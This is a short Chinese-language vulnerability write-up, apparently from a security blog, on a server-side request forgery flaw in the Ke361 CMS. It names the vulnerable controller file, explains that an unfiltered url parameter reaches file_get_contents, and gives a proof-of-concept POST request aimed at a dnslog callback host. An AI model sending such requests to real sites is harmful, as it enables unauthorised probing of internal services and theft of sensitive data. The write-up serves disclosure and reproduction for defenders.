Ke361 GoodsController.class.php SSRF漏洞

漏洞描述

Ke361 GoodsController.class.php URL参数存在 SSRF漏洞,通过漏洞可以获取敏感信息。

漏洞影响

Ke361

环境搭建

https://gitee.com/jcove/ke361

漏洞复现

CMS产品页面

20231031151324214-png (1)

存在漏洞的文件为 Application/Home/Controller/GoodsController.class.php

20231031151442166-8848cf51-3dce-4462-9834-db403f2d92e9 (1)

URL参数无任何过滤,传入 file_get_contents函数,造成SSRF漏洞,构造请求

POST /index.php?s=/Goods/ajGetGoodsDetial
 
url=http://6si2gt.dnslog.cn

20231031151557261-1607f96b-c9e8-4ae0-b5cb-a2a103d905d8 (1)

20231031151645456-cef83547-528a-4ab9-8c3c-bb0df0e37e30 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容